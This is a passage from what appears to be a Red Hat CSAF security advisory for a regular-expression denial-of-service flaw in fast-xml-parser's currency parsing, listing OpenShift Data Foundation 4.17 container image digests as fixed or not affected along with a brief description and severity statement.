"9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:26503c487a93ad520e1953ccad9200be808bc93648db90eaba3a73a340483541_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:78f3e869e50bd0e69d8e6efc6e6de357aadcc06ac3659d6ec7a053cda11be88b_amd64",
"9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:fb473ae152002d124ff662e94ca9bf68f8f6a4c61c40d4f2929a55ef1c25cd20_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:0bb022ca33965fb0f9de7df36f15377a33c90d873050dcbd763370ac1f06295a_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:1070f8191e3ead7781876ed4d84ac5c5eeb54a1fa4d2c40701ebf393d345111c_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:8dbdc5fb2b8d4551e5896f65654b3dae8a5164c12b1e1ec6d7fdda348a7b8c7d_arm64",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:e7afe93fc1d88c385edc3d8ab3173e7bfb4a4f890d371836d5d2f72a2eb4abb5_amd64",
"9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:147c2497071460ba266fc5ef0768d82edb6be9d7ffaa0c514e49308cf8017e7a_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:28fd2ef06dbf379ad4204877a3492933a731f2bc1d6dd7fc1600f52a3dc3ca47_amd64",
"9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:6616912ec376e6993346b38bf637eb47d7a00aa9f58120899470c8353be02a0e_s390x",
"9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:60f6533b7262bbfad59c5e14dff71878d3ea501c3b46194155ce53bc43a119e4_amd64",
"9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:664c467321c9a5c3fec9d4fd85e16ab50677684b480cd1f346638f794ee7357c_s390x",
"9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:b14752e1e9e6b004429f3c36dbaf4ec4d36d22ab9ac84c2d5158e8fbdfb214dd_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:3472c7c043b318c2569e8a900527b13d052f1860082dba13723514795cedeec0_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54828ef99fc8d8fa3801c2ea0338a56f382018e4ae1a800dcd328fe43f7149be_arm64",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54a164ce15d25597fa3939709acbe467f728ce4f4165771a685fc507edfb92a3_s390x",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:cfa36a55dc542e3e1332a55a59588a753f80e32d905847e51efdd1478fd58f0b_amd64",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:0e2a71ed4eaa44f786428e18e01d90d3b0384169c78c5654e2ebbaac3a5ee2a4_ppc64le",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:8046b84915034f60a5e5e349b001f04b713b3aa71ced136390c5086e0c351dd4_amd64",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:9cbf21dad9ed5738ae1feb112707af3e74e02784795addf07ee4228bbd22e932_s390x",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:a42d48b82e34f1f7cb731c3bdd25e81dc5ff3a61a3ca0b8b5eecefb5e2218be0_arm64",
"9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:89cc7f0d6adb957e0f3adbdb2c023d4a6dda89e388a94d0b4015e0853971075e_ppc64le",
"9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:917e625bfea670e543f857cf7cea31380b76ceac862bee61cc490cebabd23081_amd64",
"9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:b1ba270980579090845909bb4f1e8a7b98ce8816c7c5ea60903432d138d29310_s390x",
"9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:2be1d5ad630b9e91f30e0c82cfee52231d095cee87908949170e40a39f4ed814_ppc64le",
"9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:37ec39720b1ce9701630635f158ad20414b1cda335b15b11526a7838ed189a54_s390x",
"9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:7c59771279f5227246a941925160ca2f9fc169bd13972ab68a476e62308707e1_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:328ddae72c795012c7671c214d9a84d539264f8fe855d1a9e2dbb74590e72076_s390x",
"9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:99d8b3aedcc57f57716bba144b991f7f223cdcc47ec37903c85aa20df295b3d4_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:f3f28074884a29b5d28f4535af6489f1ca8326dd60689c4bc8c862277dcb6e22_ppc64le",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:12e2b71cea2c63fb14363334287f5affa4ff3dc84f24dd51b5f57ba6a751c2da_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:7fa969e6714e0c3851f30999df5c823cd5738f28e1b2f6c06d940541c6edad4e_s390x",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:a0ac08a8a3ee9155338182d47bf55595a78aec3811c70f3fedb2ed461aad3319_arm64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:b96b09407708601d04abb6a90d16f6f1260839534d64238b6aa4c7a5f458a6a4_ppc64le",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:02e65965166ec9794f11b663de59671f159f8b2fef4d56ee5589b26bef342168_s390x",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:322bae96941ede565a681ad98fc287f442f36888e0ed2b5ec4b309c702c7488b_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:6e44cf5a814ceb7fea6ef925f6381a279837ebe2baf2980f4937e0c752afa5e2_arm64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:7a206b9fe0e540674fc9ec97b338607e61b8bfd3bfe30855835d0a940ca9304c_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:25052271f038b691ef973ac5a9fc02eee015a0427e087a5a390f1e31f7823d79_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:3342a17a1afca419dbfbff815261e91cdf8dcf0eecaf5a25a1713a39f3f95bf4_amd64",
"9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:df597ffd1b0d14d394e39b1d92fc90797bea5386a390450193d99f7db5bc377c_s390x",
"9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:883ba750931a93d30ff1dd3ed78592940a0079640da3d79400261f43fbecb69f_s390x",
"9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:baf554d45b1fb4b38b264145809c10c7733120104bc4d8bd9e1ecb0c428db382_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:c05b5597918214f845c7243b7407b6cc3c88f644eec504585bd411727376b898_amd64",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:0810e85e929ad83a8593eab74a312b9c49ec94ea9833a37b7f06bca87ca9647b_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:54cec6c71192cc9cb6c2bbcd812a5dcccd4905d5d7e822b4012622bb235fe75c_arm64",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:66de77eb933a0fb4e0d98d2c1326212d494f6c3aa2e235f27f2a641fb31ff4af_s390x",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:941371cee3ee7dd127d5663b7e1bcb39c6565031c11fb508f07c40f37aaee4d1_amd64",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:6978d438b80f8fd7572c792155c2f86cc6fa55ff0b8cb1d45bbe04e42d185fe3_ppc64le",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:7c09fb5c685be2a3029d02a35417e681f3b034269d1ac3014c1c5cdd2e035e61_s390x",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:8ccd7099f174842dab551c27a55d822cfb12d8ba26c3528f605697cbfbbf8e70_amd64",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:d0a1a2f77001e06cdb650b857433d6eebeb53eb5337354c8a042003db80387db_arm64",
"9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:01d80d9fc9cbc3f3fecab4716bde805ad97b1fbcd4942ecbb07eab9fb4714012_s390x",
"9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:6e3b814a41abf41ec9cdb5d71aafc79a086fc37f2986a3fd74f75341a4af91a2_amd64",
"9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:f8e5b7818849a95ca57347496baa35507ce634c645643303205309f55572db7d_ppc64le",
"9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:0d5aa39387a341a497a0cbc8d18c0e1e050e118b08243f5d8395ffe7394cc5f1_amd64",
"9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:26541764bf0b79a4cc87600d1a1981a247d7678f9a8c37af62e80f22213159a7_s390x",
"9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:75a85b98bcfa527709b8b1f16694a8bf68d5ea84a66b73baf5fea927df6e2904_ppc64le",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:37af72217b81a8a7b0d968ec09a396f1840155f2a472eaa68927281f080d137f_amd64",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:70ff7d9b8f6fb97fbe72768ed97519cd9e2b60dedbe1133d17fd0e317079ab3f_ppc64le",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:9d7f8b892351de60609c30d187c5547ba4bec3be2dadd0e6d8ded2c4f3c1e79e_s390x",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:f94cd1be8e371e8c85062be3e4475157cb628d339c1716bf96167e02703edf97_arm64",
"9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1b641a6aa2c4b1bc79ab0188c56f533fd89459be71b2b34f794faebaa66fd1f5_s390x",
"9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1e2ebbe9f71a03bfc6a0bd90f786293d9eec473ba2d570c8662a7f8d03dcc1b4_ppc64le",
"9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:40d75cfa1eb657512dc4da888a5bb793a3ef3d6726665bc9ad7009cdd4166a1f_amd64",
"9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:22c88c1f6be208bc0a5f0053f99ea728b9e457e150b4236a04304810270f1f80_ppc64le",
"9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:50d04e71ae52f1a246d1509c5f2abbcb2f2bb2209090526b3357b8012b4b67d5_s390x",
"9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:d7e8549c1a5cabd7324c589eadf9ccebccc1abbfb69d47826baaeaebc283c6a3_amd64",
"9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:0223d74679590c8a5fbd34f3d793c05ec671ecb406b2055166bd54f09f75bbda_amd64",
"9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:137a8a07adae2c0bb5fd1ac2a5823ffd85abe1035512a04e112e55b0aa3dc163_ppc64le",
"9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:987ed8aa1347a831f61a4d65011f5bd00a700c65f6e7fa669ff3f38131425705_s390x",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:2f414dc954bca2cd17f0bbabea11a8f18437eb417c6266d8c4750ba96957fc87_amd64",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:bf140f64657478a7f94bacd6784f7b7727d5df9ae8eb4c526f86d5533bff06ae_arm64",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:d9c38fe43617f214fea848ef7124d77f30358e2049390fc3bd3526986ff9ebbb_s390x",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:fc251ea3c441bd0d3e358969fb6730bb9e53e340da9eff8bb6a173a37116c943_ppc64le",
"9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:1055afb10a6ce469d2c77337878f510b29375a830f14505042da8a6d6081c438_amd64",
"9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:5df96c3b3dc8cdad2c8b42fd9378dc55779cdb11f64eea5fa653101505d4d497_s390x",
"9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:7cb791603d9d7c8c1c8e5200f96401ad0fadc5db14ad698e7a9519d046d0fdd0_ppc64le",
"9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:7488149277a76efe188086d283fa2acf732a4eca8bdeaa4de8744204876a77a2_amd64",
"9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:b89943771e55457bd3765efd5f3e6e6697953ee9e5c7bd123921a274b79536d3_ppc64le",
"9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:cf89aaa1ad0614707748c0ab0b26ee40855053b0f4932cd5edaa8ccf8b1470e7_s390x"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2300499"
}
],
"notes": [
{
"category": "description",
"text": "A regular expression denial of service (ReDoS) flaw was found in fast-xml-parser in the currency.js script. By sending a specially crafted regex input, a remote attacker could cause a denial of service condition.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "fast-xml-parser: ReDOS at currency parsing in currency.js",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "Red Hat has decided to rate this vulnerability as Important due to the potential loss of Availability and the low complexity.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:22b568f083c7563ffbb8d23807837a0f78cedeb156cffe9110906f3b6e0c70fb_arm64",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:50f66564131a5b2b695582956c80515d7eea64d1c009479665937c97a76e2348_ppc64le",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:a27c28ecf714cc248323a35eb58daec2aa611a318f0e61eb0defe0eaa80eb2f4_amd64",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:bee14d945af0620ad1666e67be750324a1814cbf573256c1c88521e18f9877f7_s390x"
],
"known_not_affected": [
"9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:2b9e511b21d4fefe8450f014962f2450db3e64af07f5e6e4bbfdaafafdfdc1f4_ppc64le",
"9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:9a822fddffde8f67711c5025a89e003341011e0b8145cfd5b840849cabbe68a0_amd64",
"9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:e35426de9ea6419f4981d8c6861867fc3eadcde4e41757b9a8f1ed4f2fa00dc9_s390x",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:78656a47235af49c9a7bc75d9729987edf39a77077a3f478f5b46658df18878a_amd64",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:92544e943e160d8fce1a9710a9d67ca4ccb795ff846edf7717d1e52835899202_ppc64le",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:9615793800efca765c5ae588e0547e4e18bdfe264c8a92303fbbc39276c74580_s390x",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:d6e30344ec1d541b6791b0e58cb48f4f3f492069ff8392005e8d1f16350c80e2_arm64",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:7bc24afafec3a0896c887d7eeeca47eb6f0cb12e35c62aa212ce55210cb1512d_amd64",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:93b238c24a3623bd635e162caa9a30ad7158db25eb83b545e9b365db0f769161_ppc64le",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:fb6507b95b53b19d90b82c3ac2a3b0264ebbdb9d4a8ceff3006e8a446a1cef49_s390x",
"9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:71b79ea2f0356740a0e53e89a0422f8da608dd43337dd07dfcbadc9f9d8a8884_amd64",
"9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:729fdaad48dfca53af4b3bf9bbf3cbf9dd25d5c50ddcbac03d0e8738aeb997cc_s390x",
"9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:ed0d44fd0215cd299b4929617fa1f05ea31c6ee3cc078fbf6cc884e02a59beee_ppc64le",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:1d189e8c4dfcc998d5887e1c5f06e874fa0beed29bc8f87f279299d58124a505_arm64",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:5f92812a17a6637280387a3033865d8bd13ee8d6506f8e17489cefb79c53f58e_amd64",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:7eba9da5ba5071b411bc99d33eee04e3f4530516ad984524920de542629e9b55_ppc64le",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:f8c6007e32c54ffe0597952ae6eb1d38435188d605f3995ec785dff43da4257d_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:824823d527bdbbdd2abb773e054c12b41243e15467ada76689af4fdd6fae894a_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:9521eae22f7669dea4b31841d7cfe11e5d92155b11785afb2977cea9c5d917dc_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:a94961fd2c5aea06922c9c365c3a6296abf073e09a520f190a45f687cabc7b1d_amd64",
"9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:26503c487a93ad520e1953ccad9200be808bc93648db90eaba3a73a340483541_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:78f3e869e50bd0e69d8e6efc6e6de357aadcc06ac3659d6ec7a053cda11be88b_amd64",
"9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:fb473ae152002d124ff662e94ca9bf68f8f6a4c61c40d4f2929a55ef1c25cd20_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:0bb022ca33965fb0f9de7df36f15377a33c90d873050dcbd763370ac1f06295a_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:1070f8191e3ead7781876ed4d84ac5c5eeb54a1fa4d2c40701ebf393d345111c_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:8dbdc5fb2b8d4551e5896f65654b3dae8a5164c12b1e1ec6d7fdda348a7b8c7d_arm64",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:e7afe93fc1d88c385edc3d8ab3173e7bfb4a4f890d371836d5d2f72a2eb4abb5_amd64",
"9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:147c2497071460ba266fc5ef0768d82edb6be9d7ffaa0c514e49308cf8017e7a_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:28fd2ef06dbf379ad4204877a3492933a731f2bc1d6dd7fc1600f52a3dc3ca47_amd64",
"9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:6616912ec376e6993346b38bf637eb47d7a00aa9f58120899470c8353be02a0e_s390x",
"9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:60f6533b7262bbfad59c5e14dff71878d3ea501c3b46194155ce53bc43a119e4_amd64",
"9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:664c467321c9a5c3fec9d4fd85e16ab50677684b480cd1f346638f794ee7357c_s390x",
"9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:b14752e1e9e6b004429f3c36dbaf4ec4d36d22ab9ac84c2d5158e8fbdfb214dd_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:3472c7c043b318c2569e8a900527b13d052f1860082dba13723514795cedeec0_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54828ef99fc8d8fa3801c2ea0338a56f382018e4ae1a800dcd328fe43f7149be_arm64",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54a164ce15d25597fa3939709acbe467f728ce4f4165771a685fc507edfb92a3_s390x",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:cfa36a55dc542e3e1332a55a59588a753f80e32d905847e51efdd1478fd58f0b_amd64",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:0e2a71ed4eaa44f786428e18e01d90d3b0384169c78c5654e2ebbaac3a5ee2a4_ppc64le",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:8046b84915034f60a5e5e349b001f04b713b3aa71ced136390c5086e0c351dd4_amd64",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:9cbf21dad9ed5738ae1feb112707af3e74e02784795addf07ee4228bbd22e932_s390x",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:a42d48b82e34f1f7cb731c3bdd25e81dc5ff3a61a3ca0b8b5eecefb5e2218be0_arm64",
"9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:89cc7f0d6adb957e0f3adbdb2c023d4a6dda89e388a94d0b4015e0853971075e_ppc64le",
"9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:917e625bfea670e543f857cf7cea31380b76ceac862bee61cc490cebabd23081_amd64",
"9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:b1ba270980579090845909bb4f1e8a7b98ce8816c7c5ea60903432d138d29310_s390x",
"9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:2be1d5ad630b9e91f30e0c82cfee52231d095cee87908949170e40a39f4ed814_ppc64le",
"9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:37ec39720b1ce9701630635f158ad20414b1cda335b15b11526a7838ed189a54_s390x",
"9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:7c59771279f5227246a941925160ca2f9fc169bd13972ab68a476e62308707e1_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:328ddae72c795012c7671c214d9a84d539264f8fe855d1a9e2dbb74590e72076_s390x",
"9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:99d8b3aedcc57f57716bba144b991f7f223cdcc47ec37903c85aa20df295b3d4_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:f3f28074884a29b5d28f4535af6489f1ca8326dd60689c4bc8c862277dcb6e22_ppc64le",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:12e2b71cea2c63fb14363334287f5affa4ff3dc84f24dd51b5f57ba6a751c2da_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:7fa969e6714e0c3851f30999df5c823cd5738f28e1b2f6c06d940541c6edad4e_s390x",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:a0ac08a8a3ee9155338182d47bf55595a78aec3811c70f3fedb2ed461aad3319_arm64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:b96b09407708601d04abb6a90d16f6f1260839534d64238b6aa4c7a5f458a6a4_ppc64le",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:02e65965166ec9794f11b663de59671f159f8b2fef4d56ee5589b26bef342168_s390x",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:322bae96941ede565a681ad98fc287f442f36888e0ed2b5ec4b309c702c7488b_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:6e44cf5a814ceb7fea6ef925f6381a279837ebe2baf2980f4937e0c752afa5e2_arm64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:7a206b9fe0e540674fc9ec97b338607e61b8bfd3bfe30855835d0a940ca9304c_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:25052271f038b691ef973ac5a9fc02eee015a0427e087a5a390f1e31f7823d79_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:3342a17a1afca419dbfbff815261e91cdf8dcf0eecaf5a25a1713a39f3f95bf4_amd64",
"9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:df597ffd1b0d14d394e39b1d92fc90797bea5386a390450193d99f7db5bc377c_s390x",
"9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:883ba750931a93d30ff1dd3ed78592940a0079640da3d79400261f43fbecb69f_s390x",
"9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:baf554d45b1fb4b38b264145809c10c7733120104bc4d8bd9e1ecb0c428db382_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:c05b5597918214f845c7243b7407b6cc3c88f644eec504585bd411727376b898_amd64",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:0810e85e929ad83a8593eab74a312b9c49ec94ea9833a37b7f06bca87ca9647b_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:54cec6c71192cc9cb6c2bbcd812a5dcccd4905d5d7e822b4012622bb235fe75c_arm64",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:66de77eb933a0fb4e0d98d2c1326212d494f6c3aa2e235f27f2a641fb31ff4af_s390x",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:941371cee3ee7dd127d5663b7e1bcb39c6565031c11fb508f07c40f37aaee4d1_amd64",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:6978d438b80f8fd7572c792155c2f86cc6fa55ff0b8cb1d45bbe04e42d185fe3_ppc64le",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:7c09fb5c685be2a3029d02a35417e681f3b034269d1ac3014c1c5cdd2e035e61_s390x",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:8ccd7099f174842dab551c27a55d822cfb12d8ba26c3528f605697cbfbbf8e70_amd64",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:d0a1a2f77001e06cdb650b857433d6eebeb53eb5337354c8a042003db80387db_arm64",
"9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:01d80d9fc9cbc3f3fecab4716bde805ad97b1fbcd4942ecbb07eab9fb4714012_s390x",
"9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:6e3b814a41abf41ec9cdb5d71aafc79a086fc37f2986a3fd74f75341a4af91a2_amd64",
"9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:f8e5b7818849a95ca57347496baa35507ce634c645643303205309f55572db7d_ppc64le",
"9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:0d5aa39387a341a497a0cbc8d18c0e1e050e118b08243f5d8395ffe7394cc5f1_amd64",
"9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:26541764bf0b79a4cc87600d1a1981a247d7678f9a8c37af62e80f22213159a7_s390x",
"9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:75a85b98bcfa527709b8b1f16694a8bf68d5ea84a66b73baf5fea927df6e2904_ppc64le",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:37af72217b81a8a7b0d968ec09a396f1840155f2a472eaa68927281f080d137f_amd64",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:70ff7d9b8f6fb97fbe72768ed97519cd9e2b60dedbe1133d17fd0e317079ab3f_ppc64le",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:9d7f8b892351de60609c30d187c5547ba4bec3be2dadd0e6d8ded2c4f3c1e79e_s390x",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:f94cd1be8e371e8c85062be3e4475157cb628d339c1716bf96167e02703edf97_arm64",
"9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1b641a6aa2c4b1bc79ab0188c56f533fd89459be71b2b34f794faebaa66fd1f5_s390x",
"9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1e2ebbe9f71a03bfc6a0bd90f786293d9eec473ba2d570c8662a7f8d03dcc1b4_ppc64le",
"9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:40d75cfa1eb657512dc4da888a5bb793a3ef3d6726665bc9ad7009cdd4166a1f_amd64",
"9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:22c88c1f6be208bc0a5f0053f99ea728b9e457e150b4236a04304810270f1f80_ppc64le",
"9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:50d04e71ae52f1a246d1509c5f2abbcb2f2bb2209090526b3357b8012b4b67d5_s390x",
"9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:d7e8549c1a5cabd7324c589eadf9ccebccc1abbfb69d47826baaeaebc283c6a3_amd64",
